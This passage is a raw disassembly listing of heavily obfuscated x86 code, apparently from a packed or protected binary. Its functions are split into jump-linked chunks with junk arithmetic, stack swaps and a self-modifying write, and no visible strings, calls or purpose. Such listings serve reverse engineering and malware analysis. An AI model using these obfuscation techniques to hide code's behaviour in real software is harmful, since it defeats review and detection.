; =============== S U B	R O U T	I N E =======================================



sub_4497E8	proc near		; CODE XREF: sub_40900D+4Bp
					; sub_40E632+29Cp ...

; FUNCTION CHUNK AT 00444421 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457C4E SIZE 00000005 BYTES

		push	edi
		push	0CB9DE05h
		jmp	loc_457C4E
sub_4497E8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_4497F3:				; CODE XREF: sub_43B163+1DC5Aj
		jl	loc_43EF3D

loc_4497F9:				; CODE XREF: sub_450489+7j
		jmp	loc_443EFF
; END OF FUNCTION CHUNK	FOR sub_43B163
; ---------------------------------------------------------------------------
		or	eax, 6F6389FBh
		not	ebp
		sub	ebp, esi
		or	edi, 330EA1DEh
		jmp	loc_43EF3D
; ---------------------------------------------------------------------------
		not	edx
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_449815:				; CODE XREF: sub_44113A:loc_449FDAj
		jmp	loc_44F29E
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
		dw 43E7h
dword_44981C	dd 2			; DATA XREF: sub_452458-EFCFr
		dd 3 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
		dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
		dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
		dd 3 dup(1), 2,	1C2h, 3	dup(2),	3 dup(1), 2, 1C2h, 0Bh dup(2)
		dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
		dd 1, 2, 2 dup(1), 2 dup(2), 1,	3 dup(2), 1, 2,	1, 2 dup(2)
		dd 2 dup(1), 2,	2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
		dd 1, 3	dup(2),	1, 2, 2	dup(1),	3 dup(2), 1, 3 dup(2)
		dd 1
dword_449C1C	dd 77EB36A5h		; DATA XREF: y2kk37jd:00449247w
					; sub_44FBFB+61C3w
dword_449C20	dd 0			; DATA XREF: sub_442002:loc_442006o
					; sub_4567FD-76DFo ...
dword_449C24	dd 77E60000h		; DATA XREF: sub_4508C4:loc_4485F0r
					; sub_449129+F95w ...
dword_449C28	dd 7372ACDAh, 23336CCAh, 6C3632E2h ; DATA XREF:	sub_4508C4-82C4o
					; sub_4567FD-76C5o
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_449C35:				; CODE XREF: sub_45B7AA-44E1j
		jmp	loc_454FE8
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
		dw 35E9h
byte_449C3C	db 1			; DATA XREF: sub_44884D+7ED9r
					; sub_4598BE:loc_452A66r ...
		db 9Dh,	83h, 0C7h
dword_449C40	dd 0B132749Bh, 8D192ED8h ; DATA	XREF: sub_43C2D9+4o
					; sub_4598BE-6E48o
		db 36h,	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_449C4A:				; CODE XREF: sub_44AFF6+5A00j
		jmp	loc_44DC15
; END OF FUNCTION CHUNK	FOR sub_44AFF6

; =============== S U B	R O U T	I N E =======================================



sub_449C4F	proc near		; DATA XREF: sub_4421DC+16D52o

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B20F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043B5BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E356 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E784 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F0CF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F8DF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440A93 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044150D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004419C1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00442CA1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00443CE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444067 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 004459AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D19 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004481C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448A9F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A5D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D784 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044EA97 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EE1C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004515A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451D00 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00453E32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045625C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456388 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045767C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458A2F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045BB77 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BF95 SIZE 00000010 BYTES

		adc	edx, [esp+arg_0]
		add	esp, 8
		mov	eax, [eax]
		add	eax, [ebp-4]
		jmp	loc_4515A4
sub_449C4F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_449C60:				; CODE XREF: sub_445226+A9ECj
		jz	loc_44DE34
		jmp	loc_44936E
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_449C6B:				; CODE XREF: y2kk37jd:00459087j
		push	edx
		call	sub_4464B3
		mov	eax, 6A74FD15h
		push	edi
		push	320ACFCAh
		pop	edi
		jmp	loc_43E495
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_449C82:				; CODE XREF: sub_43ED19+113CAj
					; sub_43ED19:loc_452A15j
		mov	eax, [ebp-18h]
		mov	eax, [eax]
		shl	eax, 3
		push	edx

loc_449C8B:				; CODE XREF: sub_455C79-15F87j
		mov	edx, edi
		xchg	edx, [esp-4+arg_0]
		push	58BD9DE3h
		xchg	esi, [esp+0]
		jmp	loc_43CB37
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_449C9D:				; CODE XREF: sub_43C851+9664j
		sbb	ecx, 53ACAC39h
		push	edi
		or	esi, 822F9E0Bh

loc_449CAA:				; CODE XREF: sub_43C851:loc_43EAD6j
		push	0D10A2984h
		pop	eax
		add	eax, 0A21FB83Ah
		jmp	loc_4466D5
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_449CBB:				; CODE XREF: sub_4447EA:loc_45038Fj
		add	edi, 0E1A97512h

loc_449CC1:				; CODE XREF: y2kk37jd:0044E757j
		xor	edi, 0D8D52A2Fh
		rol	edi, 12h
		cmp	edi, 4DC7DACAh
		jmp	loc_4523B8
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------

loc_449CD5:				; CODE XREF: y2kk37jd:0044E334j
		jz	loc_446B84
		jmp	loc_44456F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_449CE0:				; CODE XREF: sub_44DBF8+D867j
		cdq
		cmp	ebx, 110E0E38h
		jmp	loc_450604
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
		popf
		and	eax, 3CEDA641h
		jmp	sub_45C5CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_449CF8:				; CODE XREF: sub_445226+20Fj
		cmp	eax, 3647C568h
		jmp	loc_4416EE
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EDF8

loc_449D03:				; CODE XREF: sub_44EDF8+Ej
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0]
		mov	eax, edx
		push	offset sub_4449BB
		jmp	loc_44957B
; END OF FUNCTION CHUNK	FOR sub_44EDF8
; ---------------------------------------------------------------------------

loc_449D15:				; CODE XREF: y2kk37jd:0045C3EEj
					; y2kk37jd:0045C402j
		add	ecx, 9719D946h
		call	sub_44CB51
; START	OF FUNCTION CHUNK FOR sub_445226

loc_449D20:				; CODE XREF: sub_445226:loc_456027j
		add	esi, 13E6DD47h
		xchg	esi, [esp+0Ch+var_C]
		jmp	sub_43B4EE
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	eax, 0CAAB96A5h
		push	edi
		mov	edi, esi
		xchg	edi, [esp]
		push	0FC9AFB21h
		pop	esi
		jmp	loc_43C113
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_449D44:				; CODE XREF: sub_4411C3+A9BDj
		jz	loc_4566E3
		xor	edi, 0DEE8D73Bh
		jmp	loc_44DC67
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_449D55:				; CODE XREF: sub_442829:loc_448908j
		and	esi, ecx
		jmp	loc_44E238
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44314E

loc_449D5C:				; CODE XREF: sub_44314E:loc_443166j
		or	esi, 5EE7E34Dh
		add	esi, 15C3231h
		mov	[esi], edx
		pop	esi
; END OF FUNCTION CHUNK	FOR sub_44314E
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_449D6B:				; CODE XREF: sub_44113A+Ej
					; sub_44113A+1A204j
		xchg	eax, edx
		jmp	loc_443198
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
		push	edx
		push	0B0B90510h
		pop	edx
		and	edx, 25271E40h
		add	edx, 0E020DC60h
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_502
		jmp	loc_45AA16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_449D92:				; CODE XREF: sub_43ED19:loc_44DE3Cj
		jl	loc_44341C
; END OF FUNCTION CHUNK	FOR sub_43ED19
; START	OF FUNCTION CHUNK FOR sub_450CFC

loc_449D98:				; CODE XREF: sub_450CFC+27j
		jmp	nullsub_101
; END OF FUNCTION CHUNK	FOR sub_450CFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_449D9D:				; CODE XREF: sub_445226-6CFBj
		jmp	loc_4420F2
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		ror	ebx, 0Bh
		cdq
		jmp	loc_44341A

; =============== S U B	R O U T	I N E =======================================



sub_449DAB	proc near		; CODE XREF: sub_453093:loc_443CCAp
					; y2kk37jd:00451CD9j

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		add	ebx, 0FB4408AEh
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_4522F2
sub_449DAB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_449DBD:				; CODE XREF: y2kk37jd:0044B5CEj
		xchg	ebx, [edi]
; START	OF FUNCTION CHUNK FOR sub_453583

loc_449DBF:				; CODE XREF: sub_453583:loc_44B5B9j
		and	edi, 3EF49CFEh
		or	edi, 0C64639B2h
		add	edi, 15D8012h
		xchg	edi, [esp+0Ch+var_C]
		jmp	sub_4599BE
; END OF FUNCTION CHUNK	FOR sub_453583
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_165. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_449DDA:				; CODE XREF: y2kk37jd:004434C2j
		jmp	loc_4468F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_449DDF:				; CODE XREF: sub_4553C1-12700j
		cmp	al, 0A4h
		jz	loc_43E351
		jmp	loc_459393
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_449DEC:				; CODE XREF: sub_45689F:loc_43DB94j
		sbb	ecx, 7B2C898h
		jmp	loc_45A8D2
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_449DF7:				; CODE XREF: sub_453867:loc_44F377j
		cmp	ebx, edx
		jmp	loc_447C40
; END OF FUNCTION CHUNK	FOR sub_453867

; =============== S U B	R O U T	I N E =======================================



sub_449DFE	proc near		; CODE XREF: y2kk37jd:0043D60Ej
					; y2kk37jd:0045297Cp

; FUNCTION CHUNK AT 0043D16B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043FCD4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004448AB SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00445A04 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446BBF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447123 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044B211 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B54C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E38E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E7C3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00451C92 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A8BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A943 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		pop	edi
		mov	[ebp-6], dx
		jmp	loc_43D16B
sub_449DFE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445083

loc_449E0C:				; CODE XREF: sub_445083:loc_443CD4j
		call	sub_454942

loc_449E11:				; CODE XREF: sub_43F75D+E1C5j
		jmp	loc_443FA1
; END OF FUNCTION CHUNK	FOR sub_445083
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D1BD

loc_449E16:				; CODE XREF: sub_43D1BD+17j
		jmp	loc_458BD4
; END OF FUNCTION CHUNK	FOR sub_43D1BD
; ---------------------------------------------------------------------------
		push	3133DAF2h
		jmp	sub_4444B1
; ---------------------------------------------------------------------------
		popf
		xchg	edi, [edx]
		jmp	sub_4557D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44291B

loc_449E2D:				; CODE XREF: sub_44291B+116D6j
		push	edx

loc_449E2E:				; CODE XREF: sub_44291B:loc_453FE9j
		add	esi, 0C7D4730Bh
		or	esi, 0A77512DFh
		call	sub_43B4A5
; END OF FUNCTION CHUNK	FOR sub_44291B
; START	OF FUNCTION CHUNK FOR sub_4423DA

loc_449E3F:				; CODE XREF: sub_4423DA-5028j
		jmp	nullsub_243
; END OF FUNCTION CHUNK	FOR sub_4423DA
; ---------------------------------------------------------------------------

loc_449E44:				; DATA XREF: sub_45609B+Do
		mov	[ebp-4], eax
		push	offset sub_44EB56
		jmp	loc_45716F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_516. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_449E52:				; CODE XREF: sub_43F346+16EB4j
		jmp	loc_43BE05
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_449E57:				; CODE XREF: sub_445568:loc_440C7Aj
		mov	ecx, ebp

loc_449E59:				; CODE XREF: y2kk37jd:loc_448317j
		push	91403D92h
		and	eax, 0D910D524h
		jmp	loc_449FAA
; END OF FUNCTION CHUNK	FOR sub_445568

; =============== S U B	R O U T	I N E =======================================



sub_449E69	proc near		; CODE XREF: y2kk37jd:00441952j
					; sub_451565+6p

; FUNCTION CHUNK AT 0043C445 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443653 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443E36 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004448D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447E4D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004508D6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045194B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00452034 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00457388 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004575D2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045898D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045B73A SIZE 0000000F BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	esi
		mov	dword ptr [ebp-20h], 0FFFFFFFFh

loc_449E75:				; CODE XREF: sub_44753E+CD77j
		jno	loc_45B73A
		cmp	dword ptr [ebp-20h], 0
		jmp	loc_447E4D
sub_449E69	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:dword_41E068, eax
		lea	eax, nullsub_482
		call	sub_459718
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_189. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_449E96:				; CODE XREF: sub_445787:loc_45633Bj
		pop	ebx
		and	ebx, 77EB28F1h
		jns	loc_44BB22

loc_449EA3:				; CODE XREF: y2kk37jd:00443B34j
		jmp	loc_452B92
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------

loc_449EA8:				; CODE XREF: y2kk37jd:0043DBD8j
		jmp	loc_4441BD
; ---------------------------------------------------------------------------
		push	3C3B10FDh
		jmp	loc_43FC9C
; ---------------------------------------------------------------------------

loc_449EB7:				; CODE XREF: y2kk37jd:0044F975j
		ror	edi, 18h

loc_449EBA:				; CODE XREF: y2kk37jd:loc_446D97j
		xchg	ebp, [eax]
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_449EBC:				; CODE XREF: y2kk37jd:loc_43C9D1j
					; sub_43C865:loc_44F964j
		xor	ecx, 3F290A4Dh
		add	ecx, 0BF7074C0h
		test	ecx, 10000h
		jmp	loc_45283F
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457689

loc_449ED3:				; CODE XREF: sub_457689:loc_446A38j
		pop	edi
		or	edi, 0EDB7F581h
		rol	edi, 1
		add	edi, 0D3B001h
		xchg	edi, [esp+0Ch+var_C]
		jmp	loc_45C5F0
; END OF FUNCTION CHUNK	FOR sub_457689
; ---------------------------------------------------------------------------

loc_449EEA:				; CODE XREF: y2kk37jd:0043E7B4j
					; y2kk37jd:0043E7CCj
		rol	eax, 3
		or	eax, 0E8F501E1h
		sub	eax, 7B317AEEh
		xor	eax, 0FF4F23B9h
		add	eax, ebp
		add	eax, 7E74C550h
		push	eax
		mov	eax, [ebp+8]
		jmp	loc_441FC0
; ---------------------------------------------------------------------------

loc_449F10:				; CODE XREF: y2kk37jd:0044320Cj
		jns	loc_43D219
		sbb	ebx, eax
		jmp	loc_4457AF
; ---------------------------------------------------------------------------
		shl	ebp, 0Fh
		jmp	sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_449F25:				; CODE XREF: sub_44753E+1481Cj
		popf
		jmp	loc_43BC1D
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------

loc_449F2B:				; CODE XREF: y2kk37jd:00445619j
		pop	eax
		xor	eax, 6C986137h
		rol	eax, 16h
		jb	loc_43B861
		adc	eax, 28624048h
		jmp	loc_43FD7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_449F46:				; CODE XREF: sub_4411C3:loc_45C3F4j
		call	sub_455BE9
		mov	eax, 0FFB060E7h
		push	eax
		push	769F1BA7h
		jmp	loc_43E9D8
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_449F5B	proc near		; CODE XREF: sub_456A36:loc_456CB1p

; FUNCTION CHUNK AT 0043E807 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444F3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045983E SIZE 0000000E BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, 62h
		call	sub_454413
		jmp	loc_43E807
sub_449F5B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_458BF4
; ---------------------------------------------------------------------------
		add	ebp, edi
		jmp	sub_444D46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DC5

loc_449F7A:				; CODE XREF: sub_447DC5+Aj
		mov	byte ptr [eax],	0C3h
		jmp	sub_4477F9
; END OF FUNCTION CHUNK	FOR sub_447DC5

; =============== S U B	R O U T	I N E =======================================



sub_449F82	proc near		; CODE XREF: sub_417BB2+39p
					; y2kk37jd:00455AAAj
					; DATA XREF: ...

var_4		= dword	ptr -4

		push	ebx
		push	582501B1h
		pop	ebx
		and	ebx, 3A7AAACBh
		add	ebx, 0E8255A29h
		xchg	ebx, [esp+4+var_4]
		jmp	loc_455AB5
sub_449F82	endp

; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_44D501
		jmp	loc_4534C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_449FAA:				; CODE XREF: sub_445568+48FCj
		mov	edi, [ebp+0]
		cmp	eax, 0CF90717Dh
		jmp	loc_43B7AA
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B117

loc_449FB8:				; CODE XREF: sub_44B117+Aj
		pop	edx
		add	edx, 267396E5h
		xor	edx, 4DE9BB6Ah
		and	edx, 770CE09Fh
		call	sub_44714C

loc_449FD0:				; CODE XREF: sub_445226+14808j
		jmp	sub_443525
; END OF FUNCTION CHUNK	FOR sub_44B117
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F086

loc_449FD5:				; CODE XREF: sub_44F086-3F82j
		jmp	loc_453259
; END OF FUNCTION CHUNK	FOR sub_44F086
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_449FDA:				; CODE XREF: sub_44113A+5571j
		jb	loc_449815

loc_449FE0:				; CODE XREF: sub_44113A:loc_447752j
		push	eax
		lea	eax, loc_4431A9+3
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		jmp	loc_45B330
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_449FF2:				; CODE XREF: sub_43F346+5859j
		sub	al, 99h
		push	0C858027Dh
		pop	edx
		or	edx, 1FE8CEEFh
		add	edx, 3404FB96h
		xor	edx, 0C00DC1A7h
		jmp	loc_44CEE1
; END OF FUNCTION CHUNK	FOR sub_43F346

; =============== S U B	R O U T	I N E =======================================



sub_44A011	proc near		; DATA XREF: sub_450F17+A2F0o

; FUNCTION CHUNK AT 004403B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004414AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A3FE SIZE 00000010 BYTES

		xchg	edi, [esp+0]
		push	51A2232h
		pop	edx
		or	edx, 38CF46A8h
		and	edx, 5A9D4730h
		jmp	loc_4414AE
sub_44A011	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_44A02B:				; CODE XREF: sub_451634+18j
		jz	loc_43C24B
		jmp	loc_44BFC5
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A45E

loc_44A036:				; CODE XREF: sub_45A45E:loc_4533F1j
		jnz	loc_45AA77
		jmp	loc_442813
; END OF FUNCTION CHUNK	FOR sub_45A45E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F728

loc_44A041:				; CODE XREF: sub_43F728+16j
		add	eax, 0B9EC571Ch
		or	eax, 3461F5C1h
		add	eax, 0F7F829F2h
		call	sub_4557D7
; END OF FUNCTION CHUNK	FOR sub_43F728
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_44A058:				; CODE XREF: sub_43ED86+27F4j
		jmp	nullsub_177
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------

loc_44A05D:				; CODE XREF: y2kk37jd:0043C745j
		jmp	loc_444960
; ---------------------------------------------------------------------------

loc_44A062:				; DATA XREF: sub_44B677+1o
		push	0C149D843h
		pop	ecx
		xor	ecx, 5149BB60h
		or	ecx, 8E37B9F3h
		jmp	loc_450825
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA43

loc_44A079:				; CODE XREF: sub_43DA43+13DAj
					; sub_43DA43+13E7j
		add	edi, 476AD6B5h

loc_44A07F:				; CODE XREF: y2kk37jd:0045BA09j
		push	offset sub_449607
		jmp	nullsub_219
; END OF FUNCTION CHUNK	FOR sub_43DA43

; =============== S U B	R O U T	I N E =======================================



sub_44A089	proc near		; CODE XREF: y2kk37jd:0043F77Ej
					; sub_44CEAB-876Cp
		xchg	edi, [esp+0]
		pop	edi
		add	esp, 8
sub_44A089	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_448700

loc_44A090:				; CODE XREF: sub_448700:loc_454F0Aj
		push	offset sub_4417AF
		jmp	sub_4573E1
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
		sbb	ebx, 0CE7D103Dh
		jmp	loc_453C3B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449129

loc_44A0A5:				; CODE XREF: sub_449129-DA7Dj
		call	sub_43D5C1

loc_44A0AA:				; CODE XREF: sub_4458DD-81AFj
		xor	ebx, 7E60AB2Ch
		call	sub_43F023

loc_44A0B5:				; CODE XREF: sub_4508C4-82BAj
		lea	eax, [ebp-14h]
		push	eax

loc_44A0B9:				; CODE XREF: sub_4567FD-5F3Ej
		call	sub_43BA66
		mov	ds:dword_449C24, eax

loc_44A0C3:				; CODE XREF: sub_4411C3+FA1Fj
		lea	eax, [ebp-14h]
		xor	edx, edx
		call	sub_4581BB
		jmp	loc_44DB54
; END OF FUNCTION CHUNK	FOR sub_449129
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_44A0D2:				; CODE XREF: sub_44B814-9404j
		sub	esi, 0B69BC5E8h
		test	esi, 1
		jmp	loc_45A772
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
		add	ebx, 0E9374BCAh
		push	ebx
		jmp	sub_45C250
; ---------------------------------------------------------------------------

loc_44A0EF:				; DATA XREF: sub_446CC2:loc_442884o
		add	eax, 0DF684168h
		call	sub_440337
		mov	ds:off_41E1FC, eax
		push	offset sub_443FB8
		jmp	loc_43E7BF
; ---------------------------------------------------------------------------

loc_44A10A:				; DATA XREF: sub_43EE8A+13545o
		push	edx
		call	sub_4599BE
		call	sub_446CC2

loc_44A115:				; CODE XREF: y2kk37jd:0044D071j
		ror	ecx, 0Fh
; START	OF FUNCTION CHUNK FOR sub_453583

loc_44A118:				; CODE XREF: sub_453583-652Aj
		sub	edi, 0C65B0D1Eh
		test	edi, 200000h
		jmp	loc_4440D9
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_44A129:				; CODE XREF: sub_442938+19010j
		mov	[ecx], ebx
		push	4FE652F0h

loc_44A130:				; CODE XREF: sub_442938:loc_456A9Bj
		push	offset off_44FB52
		jmp	loc_4480FB
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45598E

loc_44A13A:				; CODE XREF: sub_45598E:loc_43E7BAj
		push	offset loc_442E62
		jmp	nullsub_171
; END OF FUNCTION CHUNK	FOR sub_45598E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_44A144:				; CODE XREF: sub_43F2F2:loc_441995j
		or	eax, eax
		jnz	loc_45B574
		jmp	loc_4447D7
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_44A151:				; CODE XREF: sub_4429DD+130E2j
		push	esi
		mov	esi, edx
		xchg	esi, [esp+0]
		call	sub_459F8F
		push	2FB9DDC7h
		pop	eax
		rol	eax, 1Eh
		sub	eax, 0F16FF527h
		jmp	loc_43F479
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
		push	edi
		push	0C3748403h
		pop	edi
		rol	edi, 16h
		and	edi, ds:4000F2h
		xor	edi, 6EC7494Bh
		rol	edi, 3
		jmp	loc_45BCB3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44A18E:				; CODE XREF: sub_445787:loc_456761j
		not	ebp
		sbb	ebp, edx
		jmp	loc_44E339
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
		popf
